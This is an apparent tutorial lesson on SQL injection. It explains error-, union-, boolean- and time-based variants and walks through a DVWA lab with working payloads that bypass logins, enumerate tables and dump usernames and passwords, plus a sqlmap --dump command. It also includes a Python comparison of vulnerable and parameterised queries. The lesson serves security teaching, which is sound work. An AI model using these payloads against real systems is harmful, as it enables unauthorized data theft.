Lesson 3: SQL Injection (SQLi) – A Deep Dive into One of the Most Dangerous Web Vulnerabilities

SQL Injection Vulnerability

SQL Injection (SQLi) is one of the most well-known, dangerous, and persistent web application vulnerabilities. Despite being discovered over two decades ago, SQLi continues to plague insecure applications and has been responsible for some of the biggest security breaches in history. In this lesson, we’ll break down what SQL Injection is, how it works, the different types of attacks, and how to exploit it in a controlled lab environment.


What is SQL Injection?

At its core, SQL Injection is a technique where an attacker manipulates user-supplied input so that it gets interpreted as part of a SQL query. If the application does not properly validate or sanitize inputs, the attacker can alter queries to the database and potentially:

  • Bypass authentication
  • Extract sensitive data (like usernames, passwords, credit card numbers)
  • Modify or delete records
  • Execute administrative operations on the database
  • In severe cases, execute system commands on the underlying server

This makes SQLi not just a vulnerability but a critical security risk that can lead to total compromise of the application and its data.

Diagram: User Input → Vulnerable Application → Database, showing how injected input alters the query sent to the database.

Understanding How SQL Injection Works

Consider a simple login form where a user enters their username and password. The backend code may look something like this:

SELECT * FROM users WHERE username = '$username' AND password = '$password';

If the application does not sanitize inputs, an attacker could enter the following in the username field:

' OR '1'='1

And leave the password blank. The resulting query becomes:

SELECT * FROM users WHERE username = '' OR '1'='1' AND password = '';

Since '1'='1' is always true, the WHERE clause can be satisfied without valid credentials, and the login check is bypassed. Note that AND binds more tightly than OR, so with the payload only in the username field the condition is evaluated as username = '' OR ('1'='1' AND password = ''); entering the same payload in the password field (or in both fields) is the classic form, because the OR then covers the whole condition and the query returns every user.

This is the simplest form of SQL Injection, but real-world attacks can get far more sophisticated.


Types of SQL Injection

SQL Injection comes in different forms depending on how the application and database respond. Here are the main categories:

1. Error-Based SQL Injection

This method relies on the application displaying database error messages. By deliberately breaking the query, an attacker can extract information from error responses, such as database version, structure, and table names.

Example payload:

' AND 1=CONVERT(int,(SELECT @@version))--

2. Union-Based SQL Injection

The UNION SQL operator combines the result sets of two queries that return the same number of columns. Attackers can use this to append data from other tables to the results of the original query.

Example payload:

1' UNION SELECT null, version() --

This returns the database version alongside the normal query results.

3. Boolean-Based Blind SQL Injection

When no errors are shown, attackers can infer results based on true/false conditions. By sending different queries and observing application behavior, they can reconstruct data.

Example payload:

1' AND 1=1 --
1' AND 1=2 --

If the first returns results and the second doesn’t, the injection point is confirmed.

4. Time-Based Blind SQL Injection

If there is no visible difference in the response, attackers can use time delays to extract information.

Example payload:

1' OR IF(1=1, SLEEP(5), 0)--

If the page delays for 5 seconds, it confirms injection is possible.


Real-World Impact of SQL Injection

The consequences of SQL Injection go far beyond just pulling usernames and passwords. A successful SQLi attack could:

  • Completely bypass authentication and grant admin access.
  • Dump entire databases, exposing sensitive customer records.
  • Modify or delete data, causing permanent damage.
  • In some cases, escalate to remote code execution and take over the server.

This is why SQL Injection consistently appears in the OWASP Top 10 list of critical security risks.


Hands-On: Exploiting SQL Injection in DVWA

To exploit SQL Injection on DVWA (Damn Vulnerable Web Application), follow this detailed step-by-step tutorial. DVWA is designed for learning web security and practicing attacks safely.


Prerequisites:

  • DVWA installed and running (usually on localhost or a VM)
  • Browser
  • Basic knowledge of SQL and web requests

Step 1: Set DVWA Security Level to Low

  1. Log in to DVWA (default credentials: admin/password).
  2. Go to DVWA Security on the left menu.
  3. Set the security level to Low and save.
DVWA Security settings

Step 2: Navigate to the SQL Injection Module

  1. Click on SQL Injection in the left menu.
  2. You will see a form asking for a user ID.

Step 3: Understand the Input Field

The form takes a user ID as input and returns user details.

The backend runs a query like:

SELECT first_name, last_name FROM users WHERE user_id = '<input>';

If the input is concatenated into the query without sanitisation or parameterisation, this query is vulnerable to SQL Injection.


Step 4: Basic SQL Injection Test

Input: 1' OR '1'='1

This changes the query to:

SELECT first_name, last_name FROM users WHERE user_id = '1' OR '1'='1';

Because '1'='1' is always true, this returns all users.

SQL Injection Exploitation

Step 5: Extract Data Using SQL Injection

Extracting database version:

Input:

1' UNION SELECT null, @@version -- 

Explanation:

UNION SELECT appends the rows of a second query to the results of the first; both queries must return the same number of columns.

null is a placeholder that fills the first column so the column count matches the original query (first_name, last_name).

@@version returns the database version string (MySQL).

-- comments out the rest of the original query, including the closing quote. MySQL only treats -- as a comment when it is followed by a space, so the payload ends in "-- ".


Step 6: Enumerate Database Tables

Input:

1' UNION SELECT null, table_name FROM information_schema.tables WHERE table_schema=database() --

This returns table names in the current database.

SQL Injection database extraction

Step 7: Extract Columns from a Table

Suppose you found a table called users.

Input:

1' UNION SELECT null, column_name FROM information_schema.columns WHERE table_name='users' --

This returns column names in the users table.


Step 8: Extract Data from Columns

Suppose the users table has user and password columns.

Input:

1' UNION SELECT user, password FROM users --

This will dump usernames and passwords.
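The following is an added example, not code from the lesson or from DVWA: it reproduces the lesson's string-built login and user_id queries in Python against a constructed in-memory SQLite table (standing in for DVWA's MySQL users table), runs the Step 4 and Step 8 payloads against them, and shows the parameterised form of each query treating the same payloads as plain values. The table contents and the function names are constructed for the example.

```python
import sqlite3

# Constructed stand-in for DVWA's users table (sample rows, not real data).
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users (user_id INTEGER, user TEXT, password TEXT,
                            first_name TEXT, last_name TEXT);
        INSERT INTO users VALUES (1, 'admin',   'secret1', 'admin',  'admin');
        INSERT INTO users VALUES (2, 'gordonb', 'secret2', 'Gordon', 'Brown');
    """)
    return db

# Vulnerable: the lesson's string-built queries. Whatever the caller types
# is spliced into the statement and parsed as SQL syntax.
def login_vulnerable(db, username, password):
    sql = (f"SELECT user FROM users WHERE user = '{username}' "
           f"AND password = '{password}'")
    return [row[0] for row in db.execute(sql)]

def lookup_vulnerable(db, user_id):
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return db.execute(sql).fetchall()

# Hardened: parameterised queries. The driver sends the input as a bound
# value, so quotes, OR and UNION inside it are never parsed as SQL.
def login_safe(db, username, password):
    sql = "SELECT user FROM users WHERE user = ? AND password = ?"
    return [row[0] for row in db.execute(sql, (username, password))]

def lookup_safe(db, user_id):
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return db.execute(sql, (user_id,)).fetchall()

if __name__ == "__main__":
    db = make_db()
    # Payload in the password field: the OR covers the whole WHERE clause.
    print(login_vulnerable(db, "admin", "' OR '1'='1"))    # ['admin', 'gordonb']
    # Same payload only in the username field: AND binds tighter, so the OR
    # branch still requires password = '' and matches nothing here.
    print(login_vulnerable(db, "' OR '1'='1", ""))         # []
    # Step 4 and Step 8 payloads against the user_id lookup.
    print(lookup_vulnerable(db, "1' OR '1'='1"))           # both users
    print(lookup_vulnerable(db, "1' UNION SELECT user, password FROM users -- "))
    # The parameterised versions see the payload as a literal id/password.
    print(login_safe(db, "admin", "' OR '1'='1"))          # []
    print(lookup_safe(db, "1' OR '1'='1"))                 # []
```

SQLite accepts a bare -- as a comment, whereas MySQL needs the trailing space; the parameterised functions return the same results regardless of which comment form the payload uses.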

Dumping Password from DVWA

Step 9: Use SQLMap for Automation (Optional)

SQLMap is a powerful tool to automate SQL injection exploitation.

Command:

sqlmap -u "http://<dvwa_url>/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=<your_session_id>" --dump

Replace <dvwa_url> and <your_session_id> with your lab's DVWA address and the PHPSESSID cookie of your logged-in session.


Step 10: Increase Security Level and Test Bypass

  • Set DVWA security to Medium or High.
  • Try bypassing with advanced payloads, e.g., using comments, encoding, or blind SQLi techniques.

Important Notes:

  • Always use DVWA in a controlled environment.
  • Never test SQLi on production or unauthorized systems.
  • Practice blind SQLi techniques for tougher security levels.

Key Takeaways

  • SQL Injection is one of the most powerful vulnerabilities, capable of compromising entire applications.
  • Even simple injections can bypass logins and expose sensitive data.
  • Different types of SQLi (Error-based, Union-based, Blind, Time-based) give attackers multiple ways to extract data.
  • Practicing SQL Injection in a safe lab environment like DVWA builds the foundation for advanced penetration testing.

✅ By the end of this lesson, you should have a solid understanding of SQL Injection, how it works, and hands-on experience exploiting it in a controlled environment.
